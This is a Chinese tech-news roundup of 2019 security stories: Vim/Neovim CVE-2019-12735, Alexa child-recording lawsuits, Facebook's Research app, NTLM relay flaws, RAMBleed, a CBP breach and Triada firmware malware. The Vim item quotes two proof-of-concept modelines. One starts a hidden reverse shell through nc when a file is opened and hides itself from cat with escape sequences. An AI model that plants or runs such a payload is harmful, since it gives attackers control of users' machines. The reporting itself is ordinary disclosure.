内容转载

= ̄ω ̄= 内容转载

Vim 与 Neovim 曝出任意代码执行漏洞

安全研究人员发现 Vim 与 Neovim 中存在一个任意执行漏洞,允许黑客在用户打开恶意文本文件时控制计算机。漏洞影响 Vim 8.1.1365 与 Neovim 0.3.6 之前的所有版本。 该漏洞存在于编辑器的 modeline(模式行)功能,此功能允许用户在文本文件的开头或结尾设置窗口尺寸和其它自定义选项,它在一个被操作系统封锁的沙箱中运行,并且可用命令也被限制,但是研究人员 Arminius 发现了绕过该安全保护的方法。 目前漏洞已经被编号为 CVE-2019-12735,Arminius 也释出了两个概念验证。 第一个是直接利用该漏洞使系统执行`uname -a`命令: :!uname -a||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt=" 另一个利用方式更加深入,一旦用户打开文件就自动启动反向 shell。为了隐藏攻击,文件将在打开时立即重写。此外,当使用 cat 输出内容时,攻击还使用终端转义序列隐藏 modeline: \x1b[?7l\x1bSNothing here.\x1b:silent! w | call system(\'nohup nc 127.0.0.1 9999 -e /bin/sh &\') | redraw! | file | silent! # " vim: set fen fdm=expr fde=assert_fails(\'set\\ fde=x\\ \\|\\ source\\!\\ \\%\') fdl=0: \x16\x1b[1G\x16\x1b[KNothing here."\x16\x1b[D \n 目前补丁也已经释出: Vim patch 8.1.1365 Neovim patch (released in v0.3.6) 更具体的细节见: https://github.com/numirias/security/blob/master/doc/2019-06-04_ace-vim-neovim.md.   (稿源:开源中国,封面源自网络。)

因 Alexa 经常收集儿童用户录音 亚马逊遭到起诉

据报道外媒,任何打开 YouTube 的人都能找到无数儿童在与 Alexa 开心交谈的视频。Alexa 是亚马逊推出的一款数字语音助手智能扬声器产品。在这款产品给用户带来便利、乐趣的同时,许多人却在担心由其带来的隐私问题。 日前,这家公司就因这个问题遇到了两起联邦诉讼。诉讼称 Alexa 经常在未经儿童或其父母同意的情况下对数百万名儿童进行录音和收集声纹。 获悉,其中一起诉讼于周二在西雅图联邦法院发起,原告为一名来自马萨诸塞州的 10 岁女孩。就在同一天,洛杉矶法院也接到了一起类似的诉讼,原告则为一名 8 岁的男孩。 诉讼的核心在于加利福尼亚州和华盛顿都被称为“两方同意州”。在这两个州中,如果想要对某人进行录音商家则必须要征得双方的同意才行。然而,西雅图的诉讼称,“亚马逊从未警告未注册用户,它正在为他们的 Alexa 互动创建持续的语音记录,更不用说征得他们的同意了。” 针对这两起诉讼案,亚马逊方面拒绝置评。   (稿源:cnBeta,封面源自网络。)

Facebook 研究 App 收集近 19 万用户数据 已被苹果封杀

新浪科技讯 北京时间 6 月 13 日早间消息,Facebook 从目前已停用的 Research 应用中收集了 18.7 万名用户的个人和敏感设备数据。苹果今年早些时候以违规为由封禁了这款应用。 Facebook 在提供给参议员理查德·布卢门塔尔(Richard Blumenthal)办公室的邮件中表示,该公司收集了 3.1 万名美国用户的数据,其中包括 4300 名年轻人。收集的其它数据来自印度用户。 今年早些时候,美国媒体调查发现,Facebook 和谷歌都在滥用苹果的企业开发者证书,这种证书主要用于开发仅供企业员工使用的 iPhone 和 iPad 应用。调查发现,这些公司违反了苹果的规定,在苹果 App Store 之外提供面向普通用户的应用。这些应用收集参与者使用设备的数据,了解他们的使用习惯,同时向用户支付报酬。 苹果为此先后撤销了 Facebook 和谷歌的企业开发者证书,封禁了这些应用。不过在回答议员的问题时,苹果表示,该公司不清楚有多少设备安装了 Facebook 的违规应用。 苹果联邦事务总监蒂莫西·鲍德利(Timothy Powderly)表示:“我们知道 Facebook Research 应用的配置文件是在 2017 年 4 月 19 日创建的,但这并不一定就是 Facebook 向终端用户分发配置文件的日期。” Facebook 表示,这款应用可以回溯至 2016 年。 美国媒体还获得了苹果和谷歌 3 月初致议员的邮件。邮件显示,这些“研究”应用依赖于自愿参与者从 App Store 之外的下载,需要用到苹果的开发者证书来安装。随后,应用将会安装根网络证书,允许应用从设备中收集所有数据,包括网页浏览历史、加密消息和应用活动,可能还包括来自好友的数据,用于竞争性分析。(维金)   (稿源:新浪科技,封面源自网络。)

Google 研究员披露 Windows 10 0day 漏洞

安全研究员 Tavis Ormandy‏ 是谷歌 “Project Zero” 团队的一员,负责寻找 0day 漏洞。他公开了一个可利用的 Windows 漏洞,目前,微软仍处于修复过程中。 Tavis Ormandy 发推文说他已经发现了 Windows 核心加密库的安全问题,“微软承诺在 90 天内修复它,结果没有”。于是在第 91 天,Ormandy 选择了公开这个漏洞。 该漏洞实际上是 SymCrypt 中的一个错误,SymCrypt 是负责在 Windows 10 中实现非对称加密算法和在 Windows 8 中实现对称加密算法的核心加密库。Ormandy 发现,通过使用格式错误的数字证书,他可以强迫 SymCrypt 计算进入无限循环。这将有效地对 Windows 服务器执行拒绝服务(DoS)攻击,例如,运行使用 VPN 或 Microsoft Exchange Server 进行电子邮件和日历时所需的 IPsec 协议的服务。 Ormandy 还指出,“许多处理不受信任内容的软件(如防病毒软件)会在不受信任的数据上调用这些例程,这将导致它们陷入僵局。” 不过,他还是将其评为低严重性漏洞,同时补充说,该漏洞可以让人相对轻松地拆除整个 Windows 机群,因此值得注意。 Ormandy 发布的公告提供了漏洞的详细信息,以及可能导致拒绝服务的格式错误的证书示例。 如前所述,Project Zero 有 90 天的披露截止日期。Ormandy 于 3 月 13 日首次报告此漏洞,然后在 3 月 26 日,微软确认将发布安全公告,并在 6 月 11 日的 Patch Tuesday 中对此进行修复。Ormandy 认为,“这是 91 天,但在延长期内,所以它是可以接受的。” 6 月 11 日,微软安全响应中心(MSRC)表示“该修补程序今天不会发布,并且由于测试中发现问题,在 7 月发布之前也不会修补好”,于是 Ormandy 公开了这个漏洞。 公开的漏洞地址:https://bugs.chromium.org/p/project-zero/issues/detail?id=1804 消息来源:Forbes   (稿源:开源中国,封面源自网络。)

微软修复了五个 SandboxEscaper 零日漏洞中的四个

过去几个月,微软一直深受“沙箱逃逸”(SandboxEscaper)零日漏洞的困扰。因为黑客那边不按常理出牌,不仅没有给出 90 天的预备披露时间,还接二连三地抛出了针对 Windows 操作系统的特权提升漏洞。万幸的是,尽管准备工作有点仓促,该公司还是设法修复了已流出概念验证代码的五个漏洞中的四个,且目前尚无被人在野外利用的报道。 视频来源:https://twitter.com/i/status/1130968702239891456 据悉,已修补的这四个 SandboxEscaper 漏洞分别为: ● CVE-2019-1069 | 任务计划程序的特权提升漏洞 ● CVE-2019-1053 | Windows Shell 的特权提升漏洞 ● CVE-2019-1064 | Windows 特权提升漏洞 ● CVE-2019-0973 | Windows Installer 特权提升漏洞 鉴于漏洞的普遍严重程度,还请诸位及时安装每月发布的安全更新。   (稿源:cnBeta,封面源自网络。)

微软 NTLM 协议曝出重大漏洞 现有缓解措施很难彻底修复

近日,外媒报道了微软 NTLM 协议中存在的新漏洞,或导致在任何 Windows 计算机上执行远程代码、或对任何支持 Windows 集成身份验证(WIA)的 Web 服务器(如 Exchange 和 ADFS)进行身份验证。具体说来是,Perrmpt 研究小组发现了由三个逻辑缺陷组成的两个严重漏洞,且所有 Windows 版本都易受到攻击影响。更糟糕的是,新漏洞可绕过微软此前已部署的缓解措施。 NTLM 中继流程示意(来自:HelpNetSecurity,via MSPU) 据悉,NTLM Relay 是 Active Directory 环境中最常用的攻击技术之一。虽然微软此前已经开发了几种缓解 NTLM 中继攻击的缓解措施,但 Preempt 研究人员发现其仍然存在隐患: ● 消息完整性代码(MIC)字段可确保攻击者不会篡改 NTLM 消息,但研究人员发现的旁路攻击,可以卸下 MIC 的保护,并修改 NTLM 身份验证流程中的各个字段,如签名协商。 ● SMB 会话签名可防止攻击者转发 NTLM 身份验证消息以建立 SMB 和 DCE / RPC 会话,但旁路攻击仍能将 NTLM 身份验证请求中继到域中的任何服务器(包括域控制器),同时建立签名会话以执行远程代码。如果中继身份验证属于特权用户,则会对全域造成损害。 ● 增强型身份验证保护(EPA)可防止攻击者将 NTLM 消息转发到 TLS 会话,但攻击者仍可绕过并修改 NTLM 消息,以生成合法的通道绑定信息。这使得攻击者可利用用户权限连接到各种 Web 服务,并执行读取用户电子邮件(通过中继到 OWA 服务器)、甚至连接到云资源(通过中继到 ADFS 服务器)等各种操作。 Preempt 负责地向微软公司披露了上述漏洞,后者在周二的时候发布了 CVE-2019-1040 和 CVE-2019-1019 补丁来应对这些问题。 然而 Preempt 警告称,这么做还不足以充分应对 NTLM Relay 带来的安全隐患,因为管理员还需要对某些配置加以更改,才能确保有效的防护。 下面是管理员的建议操作: (1)执行修补程序 – 确保为工作站和服务器打上了所需的补丁。 (2)强制 SMB 签名,放置攻击者发起更简单的 NTLM 中继攻击,请务必在网络中的所有计算机上启用 SMB 签名。 (3)屏蔽 NTLMv1 – 该版本相当不安全,建议通过适当的组策略来完全封禁。 (4)强制执行 LDAP / S 签名 – 要防止 LDAP 中的 NTLM 中继,请在域控制器上强制执行 LDAP 签名和 LDAPS 通道绑定。 (5)实施 EPA – 为防止 Web 服务器上的 NTLM 中继,请强化所有 Web 服务器(OWA / ADFS),仅接受使用 EPA 的请求。 (6)减少 NTLM 的使用 – 因为即便采用了完整的安全配置,NTLM 也会比 Kerberos 带来更大的安全隐患,建议在不必要的环境中彻底弃用。   (稿源:cnBeta,封面源自网络。)

RAMBleed 扩展位翻转攻击领域,成功获取 OpenSSH 2048 位密钥

几名安全研究人员发表了一篇论文,介绍了一种基于位翻转漏洞 Rowhammer,并且将其威胁从内存完整性缺失扩展到内存信息泄露领域的技术 RAMBleed,表明位翻转的利用能力远超出当前人们的想象。 RAMBleed 是一种侧信道攻击,攻击者可以读取其它进程中的物理内存。研究者介绍,这一技术利用了几年前就出现的位翻转漏洞 Rowhammer,这是一种故障攻击,攻击者使用特定的存储器访问序列,使得内存出现位翻转,也就是 bit 值(0/1)改变。由于攻击者不直接访问更改的内存位置,因此 CPU 或操作系统一般不会察觉到问题。虽然这种位翻转技术不太好控制,但是其能力已被应用于沙箱逃逸、对操作系统和虚拟机管理程序的提权攻击、DoS 与加密协议故障注入等攻击。 过去人们认为 Rowhammer 攻击都是只能够破坏内存的完整性,也就是说,攻击者使用 Rowhammer 将有限的写入原语获取到其它无法访问的内存中,然后修改该内存的内容,而只要通过内存完整性检查就可以缓解这种攻击,比如使用以保护内存完整性为目标的内存或者带有纠错码(ECC)的内存。特别是纠错码技术,一直被认为是防止 Rowhammer 的有效手段,它可以在检测到位翻转时将其纠正。虽然近期有证据表明攻击者可以绕过 ECC 机制,使得在纠错后仍可观察到的位翻转,但成功纠正翻转仍然被认为是良性的,没有任何安全隐患。 但是研究者认为这样的想法不可靠,于是论文提出两个问题: Rowhammer 构成的威胁是否仅限于内存完整性缺失? 纠正位翻转的安全隐患是什么?即使 ECC 内存纠正了所有翻转位,攻击者是否可以使用 Rowhammer 来破坏机密性? 结果表明位翻转的利用能力远超出当前人们的想象,位翻转漏洞 Rowhammer 的威胁不仅仅是内存完整性缺失,它还可以用于获取内存信息。 研究人员研究出了一种 RAMBleed 攻击方法,这是一种侧信道攻击,通过观察 Rowhammer 引发的位翻转,可以推断出附近 DRAM 行中的值,因此可以读出属于其它进程的物理内存,论文中他们还演示了使用 RAMBleed 对 OpenSSH 的攻击,并成功获取了泄漏的 2048 位 RSA 密钥。 此外,与 Rowhammer 不同,RAMBleed 不需要持久的位翻转,因此服务器机器常用的 ECC 内存对于缓解该攻击是无效的。 研究人员将在 2020 年 5 月举行的第 41 届 IEEE 安全和隐私研讨会上发表题为“RAMBleed:在没有访问它们的情况下读取内存位”(RAMBleed: Reading Bits in Memory Without Accessing Them)的论文,进一步介绍该攻击手法。 论文地址:https://rambleed.com   (稿源:开源中国,封面源自网络。)

美国海关机构遭数据入侵:经陆路入境旅客信息恐被盗

北京时间6月11日早间消息,据美国科技媒体TechCrunch报道,美国海关与边境保护局(CBP)证实该机构遭到数据入侵,导致出入美国的旅客照片和车辆的照片出现泄漏。CBP的一位发言人在一份邮件中表示,这些照片先是被转移到了一个分包公司的网络上,之后通过一次“恶意网络攻击”被盗走。 CBP自己的网络在这次攻击中没有收到影响。 CBP在一份声明中表示:“CBP了解到,一个分包公司违反了CBP的政策,在没有获得CBP的授权,也没有告知CBP的情况下,将CBP收集的机动车车牌图像和旅客的图像转移到了分包公司自己的网络上。初步调查信息显示,这个分包公司违反了合同中规定的强制安全规定和隐私条款。” CBP最初是在5月31日发现的本次数据入侵事件。CBP的发言人没有透露具体有多少人的照片遭到了泄露,也没有明确指出这家分包公司的具体名称。 当前不清楚的还包括本次被盗取的都是哪种类型的图片,例如这些图像是CPB官员直接拍摄的,还是旅客在进入美国国境时被该机构的人脸识别技术自动拍摄的。 之后有消息称,从机场进入美国的旅客没有收到本次事件的影响,只有经由陆路进入美国国境的旅客信息遭到泄露。《纽约时报》援引一位政府官员的说法报道称:“有不超过10万张照片遭到了泄露。” CBP发言人没有就此报道发表评论。 CBP每天都会处理超过100万进入美国境内的旅客信息,该机构掌握着大量旅客图像信息,并且将它们储存在数据库中,这些图像包括护照与签证等重要信息。(永妍)   (稿源:新浪科技,封面源自网络。)

研究:只有 5.5% 的被发现漏洞曾遭到利用

据外媒报道,本周发表的一项新研究揭示了在过去 10 年里发现的安全漏洞中实际遭到利用的数量。据悉,这项被认为是迄今为止在同类研究中最广泛的研究发现,在 2009 年至 2018 年发现的 7.6 万个安全漏洞中只有 4183 个安全漏洞遭到利用。 更有趣的是,研究人员发现,在公共网站上发布概念验证(PoC)攻击代码与网络攻击尝试之间没有相关性。 研究小组表示,2009 年至 2018 年间,在 4183 个安全漏洞中只有一半的漏洞代码曾出现在公共网站上。 这意味着,没有公共 PoC 并不一定会阻止攻击者利用某些漏洞–一些黑客在需要的时候会利用自己的漏洞。 严重缺陷被利用的最多 研究指出,在外被利用的大多数漏洞都是安全漏洞,它们都具有很高的 CVSSv2 严重性评分(可以从 1 到 10,其中 10 分被分配给最危险和最容易遭到利用的漏洞)。 研究小组表示:“在所有被利用的漏洞中,将近一半的漏洞 CVSS 的得分是 9 分或更高。” 据悉,这项研究的核心数据由多种来源汇编而成的。例如,从 NIST 的国家漏洞数据库(NVD)中提取了所有安全漏洞、分数和漏洞特征的列表。而与在外发现的攻击有关数据则从防御工事实验室收集而来,有关攻击的证据从 SANS Internet Storm Center、Secureworks CTU、Alienvault 的 OSSIM 元数据和 reverse Labs 元数据中收集而来。关于编写的利用代码信息来自 Exploit DB、利用框架(Metasploit、D2 Security 的 Elliot Kit 和 Canvas Exploitation Framework)、Contagio、Reversing Labs 和 Secureworks CTU,研究团队发现在 2009 年到 2018 年间 PoCs 发布的数量有 9726 个。 此外,通过 Kenna Security,安全研究人员还获得了从扫描数百个公司网络的漏洞扫描器信息中提取的每个漏洞的流行程度。 未来 研究人员希望,他们这一安全漏洞研究将能帮助企业优先考虑其首先想到的漏洞修补以及那些最有可能遭到攻击的漏洞。 这份研究表明,一个漏洞的 CVSSv2 得分越高,它遭到严重利用的可能性就越大–无论利用代码公开与否。 另外,受到攻击的漏洞数量是 1/20,而不是以前的研究表明的 1/10。 此外,研究团队还希望他们的工作将能增强整个 CVSS 框架并提供关于特定漏洞可能会被利用的新信息,进而帮助那些依赖 CVSS 评分来评估和优先打补丁的组织提供更好的指导。   (稿源:cnBeta,封面源自网络。)

谷歌剖析 Triada 安卓病毒:在手机发售前感染系统镜像

继俄罗斯安全公司卡巴斯基 3 年前首次公开报告之后,今天谷歌安全博客发文称通过他们的供应链已经确认部分 Android 设备的固件更新已经被感染,以便于黑客安装恶意程序。黑客利用名为“Triada”的恶意程序感染这些固件,卡巴斯基于 2016 年 3 月的官方博客中首次描述了这种恶意软件。 该恶意程序可以和众多命令、控制中心进行通信,并允许安装可用于发送垃圾邮件和显示广告的应用程序。2017年7月,反病毒厂商 Dr Web 发现 Triada 被内置到许多 Android 设备的固件中,其中包括 Leagoo M5 Plus,Leagoo M8,Nomu S10 和 Nomu S20 等等。而且由于该恶意程序属于操作系统本身,因此无法轻松删除。 谷歌 Android 安全和隐私团队成员 Lukasz Siewierski 于周四发布了一篇详细的博客文章,证实了 Web 博士近两年前的报道。他在博文中写道 “Triada 应用程序的主要目的是在显示广告的设备上安装垃圾应用程序。” 谷歌在博文中写道:“Triada 的创建者通过垃圾应用上显示的广告来牟利。和其他同类恶意软件相比,Triada 更加复杂且不常见。Triada 是从 rooting trojans 木马发展而来的,但随着 Google Play Protect 对防御这种攻击的增强, Triada 恶意程序被迫转型以系统镜像后门方式进行感染。但是,由于 OEM 合作和我们的推广工作,原始设备制造商准备了系统映像,其安全更新消除了 Triada 感染。” 尽管 Siewierski 在博文中并未提及具体的手机型号,但是提到了几家已经受到感染的手机厂商名称。他表示:“Triada在量产环节中通过第三方来感染设备系统镜像。有时 OEM 厂商希望包含不属于 Android 开源项目的功能,例如面部解锁等。” 他表示:“OEM 可能会与可以开发所需功能的第三方合作,并将整个系统映像发送给该供应商进行开发。基于分析,我们认为使用 Yehuo 或 Blazefire 的供应商返回了感染 Triada 恶意程序的系统固件。”   (稿源:cnBeta,封面源自网络。)